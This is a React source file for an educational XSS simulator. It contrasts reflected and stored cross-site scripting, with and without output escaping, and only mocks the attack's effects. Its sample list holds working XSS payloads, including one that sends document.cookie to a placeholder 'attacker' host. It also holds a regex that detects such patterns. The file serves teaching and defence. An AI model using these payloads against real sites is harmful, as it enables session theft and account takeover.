// XSSLab.js
import React, { useState, useRef, useEffect } from "react";
import "./XSSLab.css";

/**
 * XSSLab — safe visual simulator of reflected & stored XSS
 * - Simulates payload delivery, interception, storage, and execution (mock).
 * - Does NOT execute user-supplied scripts. Instead it detects suspicious patterns
 *   and displays a simulated effect so it's safe for demos & teaching.
 */

const SAMPLE_PAYLOADS = {
  "Harmless text": "Hello 👋",

  "Simple alert": "<script>alert('XSS')</script>",
  "Img onerror": `<img src=x onerror="alert('XSS')">`,
  "Inline event": `<div onclick="alert('XSS')">click me</div>`,
  "Payload with JS": `"><script>fetch('https://attacker/steal?c='+document.cookie)</script>`,
};

function escapeHtml(s = "") {
  return s
    .replaceAll("&", "&amp;")
    .replaceAll("<", "&lt;")
    .replaceAll(">", "&gt;")
    .replaceAll('"', "&quot;")
    .replaceAll("'", "&#39;");
}

// Very small heuristic to detect likely dangerous XSS payloads
function looksLikeXss(payload) {
  const p = payload.toLowerCase();
  return /<script\b|onerror=|onload=|javascript:|document\.cookie|innerhtml|eval\(|alert\(/i.test(
    p
  );
}

export default function XSSLab() {
  const [storedPayloads, setStoredPayloads] = useState([]); // simulate DB
  const [terminal, setTerminal] = useState("Ready.\n");
  const [mode, setMode] = useState("reflected"); // reflected | stored
  const [sanitize, setSanitize] = useState(false);
  const [lastRendered, setLastRendered] = useState(null); // {source:'server'|'client', payload, executed:boolean}
  const termRef = useRef(null);
  const [selectedSample, setSelectedSample] = useState("Harmless text"); // default harmless text
  const [input, setInput] = useState(SAMPLE_PAYLOADS["Harmless text"]); // textarea also initialized

  useEffect(() => {
    if (termRef.current) {
      termRef.current.scrollTop = termRef.current.scrollHeight;
    }
  }, [terminal]);

  const log = (msg) => setTerminal((t) => t + msg + "\n");

  const handlePickSample = (key) => {
    setInput(SAMPLE_PAYLOADS[key]);
    log(`[*] Loaded sample: ${key}`);
  };

  const handleSend = () => {
    log(`[*] User submits message (mode=${mode}, sanitize=${sanitize})`);
    const payload = input;

    if (mode === "reflected") {
      // reflect back to user via "server"
      log(
        "[*] Request reaches server (simulated). Server reflects user input in page."
      );
      // server "reflects" the payload back
      const serverRendered = sanitize ? escapeHtml(payload) : payload;
      simulateRender("server", payload, serverRendered, sanitize);
    } else {
      // stored: save to DB and later another user loads the page
      setStoredPayloads((s) => [...s, payload]);
      log(`[*] Payload stored. DB entries: ${storedPayloads.length + 1}`);
      // Simulate another user viewing the stored payload immediately
      setTimeout(() => {
        log(
          "[*] Another user visits page; server retrieves stored item and renders it."
        );
        const serverRendered = sanitize ? escapeHtml(payload) : payload;
        simulateRender("server", payload, serverRendered, sanitize);
      }, 800);
    }
  };

  const simulateRender = (source, rawPayload, renderedContent, sanitized) => {
    // determine if renderedContent would have been "executable"
    const suspicious = looksLikeXss(rawPayload) && !sanitized;
    setLastRendered({
      source,
      payload: rawPayload,
      rendered: renderedContent,
      executed: suspicious,
    });

    if (suspicious) {
      log(
        `[!] Suspicious payload detected during render: executing simulated effect`
      );
      // Simulate effect: e.g., mock alert, DOM substitution, cookie leak
      // We'll not execute anything — just show visually in the UI.
      log(
        `[!] Simulated attack effects: mock alert + DOM mutation shown in viewer`
      );
    } else {
      log("[*] Content rendered safely (no script execution)");
    }
  };

  const handleClear = () => {
    setInput("");
    setTerminal("Ready.\n");
    setStoredPayloads([]);
    setLastRendered(null);
    log("[*] Reset simulation.");
  };

  const handleViewStored = (index) => {
    const payload = storedPayloads[index];
    log(`[*] Viewing stored entry #${index + 1}`);
    const serverRendered = sanitize ? escapeHtml(payload) : payload;
    simulateRender("server", payload, serverRendered, sanitize);
  };

  return (
    <div className="xsslab-container">
      <h1 className="xsslab-title">🧨 XSS Simulation Lab</h1>
      <p className="xsslab-sub">
        Simulate <strong>Reflected</strong> and <strong>Stored</strong> XSS
        safely. This lab <em>detects</em> dangerous patterns and shows a{" "}
        <em>simulated</em> execution effect — it does not run arbitrary scripts.
      </p>

      <div className="xsslab-grid">
        {/* Left: input / controls */}
        <div className="panel">
          <h2>Payload Builder</h2>

          <label>Mode</label>
          <select value={mode} onChange={(e) => setMode(e.target.value)}>
            <option value="reflected">
              Reflected XSS (input → immediate render)
            </option>
            <option value="stored">Stored XSS (input saved server-side)</option>
          </select>

          <label>Sanitize on server?</label>
          <div className="row">
            <button
              className={!sanitize ? "sample-btn" : "sample-btn active"}
              onClick={() => {
                setSanitize(false);
                log("[*] Server-side sanitization: OFF");
              }}
            >
              Vulnerable
            </button>
            <button
              className={sanitize ? "sample-btn active" : "sample-btn"}
              onClick={() => {
                setSanitize(true);
                log("[*] Server-side sanitization: ON (escaping output)");
              }}
            >
              Sanitized
            </button>
          </div>

          <label>Payload (type or paste)</label>
          <textarea
            value={input}
            onChange={(e) => setInput(e.target.value)}
            placeholder="Type payload here, e.g. <script>alert('xss')</script>"
            rows={4}
          />

          <div className="sample-lists">
            <label>Samples:</label>
            <select
              value={selectedSample} // now binds to the sample key
              onChange={(e) => {
                const key = e.target.value;
                setSelectedSample(key); // update dropdown selection
                setInput(SAMPLE_PAYLOADS[key]); // update payload textarea
                log(`[*] Loaded sample: ${key}`);
              }}
            >
              {Object.keys(SAMPLE_PAYLOADS).map((k) => (
                <option key={k} value={k}>
                  {k}
                </option>
              ))}
            </select>
          </div>

          <div className="row" style={{ marginTop: 12 }}>
            <button onClick={handleSend} className="primary">
              Send
            </button>
            <button onClick={handleClear} className="secondary">
              Reset
            </button>
          </div>

          <div className="small-note" style={{ marginTop: 8 }}>
            Stored DB entries: <strong>{storedPayloads.length}</strong>
          </div>

          {storedPayloads.length > 0 && (
            <div className="stored-list">
              <strong>Stored entries (click to view):</strong>
              <div>
                {storedPayloads.map((p, i) => (
                  <button key={i} onClick={() => handleViewStored(i)}>
                    View #{i + 1}
                  </button>
                ))}
              </div>
            </div>
          )}
        </div>

        {/* Middle: simulated victim/viewer */}
        <div className="panel">
          <h2>Viewer (what a user sees)</h2>

          <div className="viewer-frame">
            <div className="viewer-header">Website Page</div>

            <div className="viewer-content">
              <div className="viewer-row">
                <strong>Rendered Output:</strong>
                <div className="render-box">
                  {/* We never set dangerouslySetInnerHTML; instead we show safe escaped HTML
                      and a separate simulated "attack effect" if needed. */}
                  <pre className="rendered-raw">
                    {lastRendered ? lastRendered.rendered : "<no content yet>"}
                  </pre>
                </div>
              </div>

              <div className="viewer-row">
                <strong>Visual result:</strong>
                <div className="visual-box">
                  {!lastRendered && (
                    <div className="muted">Nothing rendered yet</div>
                  )}

                  {lastRendered && !lastRendered.executed && (
                    <div className="safe-note">
                      Rendered safely — no script executed.
                    </div>
                  )}

                  {lastRendered && lastRendered.executed && (
                    <>
                      <div className="attack-badge">
                        ⚠ Simulated XSS Executed
                      </div>
                      <div className="attack-effects">
                        <div className="fake-alert">
                          ALERT: "XSS" (simulated)
                        </div>
                        <div className="dom-mutation">
                          DOM mutated:{" "}
                          <code>
                            &lt;div class="promo"&gt;Hacked!&lt;/div&gt;
                          </code>
                        </div>
                      </div>
                    </>
                  )}
                </div>
              </div>

              <div className="viewer-row">
                <strong>Source:</strong>
                <div className="muted">
                  {lastRendered ? `${lastRendered.source} render` : "—"}
                </div>
              </div>
            </div>
          </div>
        </div>

        {/* Right: attacker panel & terminal */}
        <div className="panel terminal-panel">
          <h2>Attacker & Traffic Log</h2>

          <div className="attacker-card">
            <div>
              <strong>Attacker view (what they'd capture):</strong>
            </div>
            <div className="attacker-box">
              {lastRendered ? (
                <>
                  <div>
                    <strong>Payload sent:</strong>
                    <div className="mono small">
                      {escapeHtml(lastRendered.payload)}
                    </div>
                  </div>
                  <div style={{ marginTop: 8 }}>
                    <strong>Detected as dangerous:</strong>{" "}
                    <span>
                      {looksLikeXss(lastRendered.payload) ? "YES" : "NO"}
                    </span>
                  </div>
                </>
              ) : (
                <div className="muted">No intercepted payload yet</div>
              )}
            </div>
          </div>

          <h3>Terminal</h3>
          <pre ref={termRef} className="terminal">
            {terminal}
          </pre>
        </div>
      </div>

      <div className="footer-note">
        Educational simulator — payloads are detected and handled safely. For
        real tests, use isolated lab environments and never test on production
        or third-party sites.
      </div>
    </div>
  );
}
